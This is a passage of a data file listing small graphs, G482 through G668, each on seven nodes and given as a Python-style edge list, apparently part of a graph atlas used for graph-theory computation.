[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [5, 7]]],
['edgelist',
'G482',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [4, 7]]],
['edgelist',
'G483',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2], [1, 7]]],
['edgelist',
'G484',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [2, 7]]],
['edgelist',
'G485',
7,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4], [3, 7]]],
['edgelist',
'G486',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [4, 1], [6, 2], [1, 7]]],
['edgelist',
'G487',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5], [6, 7]]],
['edgelist',
'G488',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [5, 7]]],
['edgelist',
'G489',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [3, 7]]],
['edgelist',
'G490',
7,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4], [6, 7]]],
['edgelist',
'G491',
7,
[[2, 3], [4, 2], [1, 4], [2, 1], [3, 1], [4, 3], [5, 1], [7, 6], [7, 4]]],
['edgelist',
'G492',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [1, 7]]],
['edgelist',
'G493',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 7], [6, 5], [1, 4], [3, 5]]],
['edgelist',
'G494',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2], [6, 7]]],
['edgelist',
'G495',
7,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4], [5, 7]]],
['edgelist',
'G496',
7,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 7]]],
['edgelist',
'G497',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [3, 7]]],
['edgelist',
'G498',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [4, 1], [6, 2], [6, 7]]],
['edgelist',
'G499',
7,
[[1, 2], [3, 6], [1, 3], [6, 5], [4, 2], [4, 3], [4, 1], [6, 2], [3, 7]]],
['edgelist',
'G500',
7,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [6, 2], [6, 4], [1, 7]]],
['edgelist',
'G501',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6], [6, 5], [6, 7]]],
['edgelist',
'G502',
7,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4], [6, 7]]],
['edgelist',
'G503',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [5, 7]]],
['edgelist',
'G504',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3], [1, 7]]],
['edgelist',
'G505',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [4, 7]]],
['edgelist',
'G506',
7,
[[1, 2], [3, 5], [1, 3], [6, 3], [4, 2], [4, 3], [3, 2], [5, 2], [6, 7]]],
['edgelist',
'G507',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [5, 7]]],
['edgelist',
'G508',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [3, 7]]],
['edgelist',
'G509',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [7, 6], [7, 2]]],
['edgelist',
'G510',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [3, 7]]],
['edgelist',
'G511',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5], [1, 7]]],
['edgelist',
'G512',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [2, 5]]],
['edgelist',
'G513',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [1, 7]]],
['edgelist',
'G514',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [5, 7]]],
['edgelist',
'G515',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5], [6, 7]]],
['edgelist',
'G516',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [5, 7]]],
['edgelist',
'G517',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [6, 7]]],
['edgelist',
'G518',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [1, 5]]],
['edgelist',
'G519',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3], [2, 7]]],
['edgelist',
'G520',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3], [5, 7]]],
['edgelist',
'G521',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [3, 7]]],
['edgelist',
'G522',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [4, 7]]],
['edgelist',
'G523',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [3, 7]]],
['edgelist',
'G524',
7,
[[1, 2], [3, 6], [1, 3], [6, 2], [4, 2], [4, 3], [3, 2], [7, 1], [7, 5]]],
['edgelist',
'G525',
7,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [2, 7]]],
['edgelist',
'G526',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1], [6, 7]]],
['edgelist',
'G527',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [2, 7]]],
['edgelist',
'G528',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [1, 7]]],
['edgelist',
'G529',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3], [4, 7]]],
['edgelist',
'G530',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [3, 5]]],
['edgelist',
'G531',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [4, 7]]],
['edgelist',
'G532',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [2, 7]]],
['edgelist',
'G533',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 2], [5, 7]]],
['edgelist',
'G534',
7,
[[1, 2], [3, 6], [1, 3], [6, 2], [4, 2], [4, 3], [4, 1], [7, 5], [7, 1]]],
['edgelist',
'G535',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1], [2, 7]]],
['edgelist',
'G536',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [7, 1]]],
['edgelist',
'G537',
7,
[[6, 4], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [7, 1], [7, 3]]],
['edgelist',
'G538',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1], [1, 7]]],
['edgelist',
'G539',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [6, 7]]],
['edgelist',
'G540',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [5, 7]]],
['edgelist',
'G541',
7,
[[2, 4], [3, 2], [1, 3], [6, 1], [7, 6], [4, 7], [2, 7], [1, 2], [6, 5]]],
['edgelist',
'G542',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 2], [6, 3], [6, 7]]],
['edgelist',
'G543',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [2, 7]]],
['edgelist',
'G544',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [4, 7]]],
['edgelist',
'G545',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6], [6, 5], [5, 7]]],
['edgelist',
'G546',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [1, 7]]],
['edgelist',
'G547',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1], [5, 7]]],
['edgelist',
'G548',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 2], [1, 7]]],
['edgelist',
'G549',
7,
[[1, 2], [3, 6], [1, 3], [6, 4], [4, 2], [4, 3], [6, 2], [7, 5], [7, 1]]],
['edgelist',
'G550',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 2], [6, 3], [1, 7]]],
['edgelist',
'G551',
7,
[[7, 4], [2, 3], [7, 6], [4, 5], [7, 5], [1, 6], [7, 1], [7, 2], [7, 3]]],
['edgelist',
'G552',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [7, 3], [6, 7], [3, 6]]],
['edgelist',
'G553',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [4, 5], [7, 6], [7, 1]]],
['edgelist',
'G554',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [7, 5], [7, 4]]],
['edgelist',
'G555',
7,
[[5, 2], [6, 5], [7, 6], [4, 7], [3, 4], [2, 3], [6, 3], [1, 6], [3, 1]]],
['edgelist',
'G556',
7,
[[5, 2], [4, 2], [3, 4], [5, 1], [6, 1], [6, 3], [6, 5], [7, 5], [6, 7]]],
['edgelist',
'G557',
7,
[[2, 1], [3, 2], [7, 3], [4, 7], [6, 4], [5, 6], [4, 5], [3, 4], [1, 3]]],
['edgelist',
'G558',
7,
[[1, 3], [6, 1], [2, 6], [3, 2], [5, 3], [6, 5], [7, 6], [4, 7], [3, 4]]],
['edgelist',
'G559',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [6, 7], [1, 7], [2, 4], [5, 2]]],
['edgelist',
'G560',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 5], [6, 2], [7, 2], [1, 7]]],
['edgelist',
'G561',
7,
[[1, 5], [2, 1], [5, 2], [4, 5], [3, 4], [7, 3], [6, 7], [2, 6], [3, 2]]],
['edgelist',
'G562',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [6, 4], [7, 6], [4, 7]]],
['edgelist',
'G563',
7,
[[7, 6], [4, 7], [3, 4], [1, 5], [1, 6], [2, 1], [3, 1], [2, 3], [6, 5]]],
['edgelist',
'G564',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 4], [6, 2], [7, 2], [1, 7]]],
['edgelist',
'G565',
7,
[[6, 3], [7, 6], [4, 7], [3, 4], [1, 3], [5, 1], [6, 5], [2, 6], [1, 2]]],
['edgelist',
'G566',
7,
[[3, 5], [2, 3], [5, 2], [6, 5], [1, 6], [2, 1], [7, 5], [4, 7], [3, 4]]],
['edgelist',
'G567',
7,
[[7, 3], [6, 7], [3, 6], [2, 3], [1, 2], [5, 1], [2, 5], [4, 2], [1, 4]]],
['edgelist',
'G568',
7,
[[1, 6], [7, 1], [2, 7], [5, 2], [3, 5], [4, 3], [2, 4], [6, 2], [7, 6]]],
['edgelist',
'G569',
7,
[[7, 6], [4, 7], [3, 4], [6, 3], [1, 6], [2, 1], [5, 2], [1, 5], [3, 1]]],
['edgelist',
'G570',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [7, 3], [6, 7], [3, 6], [4, 3]]],
['edgelist',
'G571',
7,
[[2, 1], [5, 2], [6, 5], [1, 6], [7, 1], [4, 7], [3, 4], [1, 3], [4, 5]]],
['edgelist',
'G572',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 1], [7, 2], [7, 4]]],
['edgelist',
'G573',
7,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 2], [6, 5], [6, 4], [7, 1], [7, 5]]],
['edgelist',
'G574',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [6, 3], [5, 6], [7, 6], [4, 7], [3, 4]]],
['edgelist',
'G575',
7,
[[2, 1], [7, 4], [1, 5], [6, 1], [4, 6], [6, 7], [2, 3], [2, 5], [7, 3]]],
['edgelist',
'G576',
7,
[[7, 3], [6, 7], [3, 6], [2, 3], [1, 4], [5, 1], [2, 5], [4, 2], [4, 5]]],
['edgelist',
'G577',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 2], [6, 7], [7, 1]]],
['edgelist',
'G578',
7,
[[1, 5], [2, 1], [3, 2], [4, 3], [1, 4], [3, 5], [6, 5], [7, 6], [4, 7]]],
['edgelist',
'G579',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 3], [7, 2], [6, 7]]],
['edgelist',
'G580',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 4], [6, 5], [7, 2], [7, 6]]],
['edgelist',
'G581',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 1], [7, 5], [7, 3]]],
['edgelist',
'G582',
7,
[[1, 5], [4, 1], [5, 4], [7, 2], [6, 7], [2, 6], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G583',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3]]],
['edgelist',
'G584',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 5]]],
['edgelist',
'G585',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1]]],
['edgelist',
'G586',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1]]],
['edgelist',
'G587',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6]]],
['edgelist',
'G588',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5]]],
['edgelist',
'G589',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3]]],
['edgelist',
'G590',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3]]],
['edgelist',
'G591',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2]]],
['edgelist',
'G592',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3]]],
['edgelist',
'G593',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4]]],
['edgelist',
'G594',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5]]],
['edgelist',
'G595',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2]]],
['edgelist',
'G596',
7,
[[1, 2],
[2, 3],
[4, 5],
[1, 3],
[4, 1],
[3, 5],
[6, 3],
[2, 6],
[5, 2],
[4, 6]]],
['edgelist',
'G597',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1]]],
['edgelist',
'G598',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 3],
[3, 7]]],
['edgelist',
'G599',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 3],
[2, 7]]],
['edgelist',
'G600',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[2, 7]]],
['edgelist',
'G601',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[1, 7]]],
['edgelist',
'G602',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[4, 7]]],
['edgelist',
'G603',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[5, 6],
[5, 7]]],
['edgelist',
'G604',
7,
[[3, 1],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[5, 4],
[4, 7]]],
['edgelist',
'G605',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 6],
[3, 7]]],
['edgelist',
'G606',
7,
[[3, 1],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[5, 4],
[3, 7]]],
['edgelist',
'G607',
7,
[[3, 4],
[2, 3],
[5, 2],
[6, 5],
[3, 6],
[1, 3],
[5, 1],
[1, 2],
[6, 1],
[7, 6]]],
['edgelist',
'G608',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[6, 7]]],
['edgelist',
'G609',
7,
[[3, 1],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[5, 4],
[5, 7]]],
['edgelist',
'G610',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 6],
[7, 6]]],
['edgelist',
'G611',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 7]]],
['edgelist',
'G612',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[7, 6]]],
['edgelist',
'G613',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[1, 7]]],
['edgelist',
'G614',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[3, 7]]],
['edgelist',
'G615',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 7]]],
['edgelist',
'G616',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[4, 7]]],
['edgelist',
'G617',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[1, 5],
[2, 1],
[5, 2],
[1, 7]]],
['edgelist',
'G618',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[2, 7]]],
['edgelist',
'G619',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[6, 5],
[5, 1],
[6, 1],
[1, 7]]],
['edgelist',
'G620',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[4, 7]]],
['edgelist',
'G621',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[6, 7]]],
['edgelist',
'G622',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[4, 7]]],
['edgelist',
'G623',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[1, 7]]],
['edgelist',
'G624',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[3, 1],
[6, 4],
[3, 4],
[7, 3]]],
['edgelist',
'G625',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[7, 5],
[7, 3]]],
['edgelist',
'G626',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[3, 7]]],
['edgelist',
'G627',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[6, 7]]],
['edgelist',
'G628',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[5, 7]]],
['edgelist',
'G629',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[4, 7]]],
['edgelist',
'G630',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[6, 5],
[5, 1],
[6, 1],
[3, 7]]],
['edgelist',
'G631',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[3, 1],
[6, 7]]],
['edgelist',
'G632',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 7]]],
['edgelist',
'G633',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[3, 1],
[6, 4],
[3, 4],
[1, 7]]],
['edgelist',
'G634',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[2, 7]]],
['edgelist',
'G635',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[5, 7]]],
['edgelist',
'G636',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[7, 5],
[7, 1]]],
['edgelist',
'G637',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[6, 7]]],
['edgelist',
'G638',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[1, 5],
[2, 1],
[5, 2],
[6, 7]]],
['edgelist',
'G639',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[3, 1],
[1, 7]]],
['edgelist',
'G640',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[3, 7]]],
['edgelist',
'G641',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[3, 7]]],
['edgelist',
'G642',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[6, 7]]],
['edgelist',
'G643',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[1, 7]]],
['edgelist',
'G644',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[6, 5],
[5, 1],
[6, 1],
[6, 7]]],
['edgelist',
'G645',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[7, 6],
[7, 5]]],
['edgelist',
'G646',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[2, 7]]],
['edgelist',
'G647',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[5, 7]]],
['edgelist',
'G648',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[5, 7]]],
['edgelist',
'G649',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[3, 7]]],
['edgelist',
'G650',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[1, 7]]],
['edgelist',
'G651',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[6, 7]]],
['edgelist',
'G652',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[2, 7]]],
['edgelist',
'G653',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[4, 7]]],
['edgelist',
'G654',
7,
[[5, 4],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[7, 1],
[7, 3]]],
['edgelist',
'G655',
7,
[[2, 1],
[3, 2],
[4, 3],
[5, 4],
[6, 5],
[2, 6],
[7, 2],
[5, 7],
[3, 7],
[6, 3]]],
['edgelist',
'G656',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[1, 7]]],
['edgelist',
'G657',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[4, 7]]],
['edgelist',
'G658',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[3, 7]]],
['edgelist',
'G659',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[7, 6],
[7, 5]]],
['edgelist',
'G660',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[2, 7]]],
['edgelist',
'G661',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 7]]],
['edgelist',
'G662',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[3, 1],
[2, 7]]],
['edgelist',
'G663',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[2, 7]]],
['edgelist',
'G664',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[2, 7]]],
['edgelist',
'G665',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[5, 7]]],
['edgelist',
'G666',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[5, 7]]],
['edgelist',
'G667',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[6, 3],
[5, 2],
[1, 7]]],
['edgelist',
'G668',
7,
[[5, 1],
[2, 5],
[4, 2],
[3, 4],
[2, 3],
[7, 2],
[1, 7],
[6, 1],
[2, 6],
[1, 2]]],
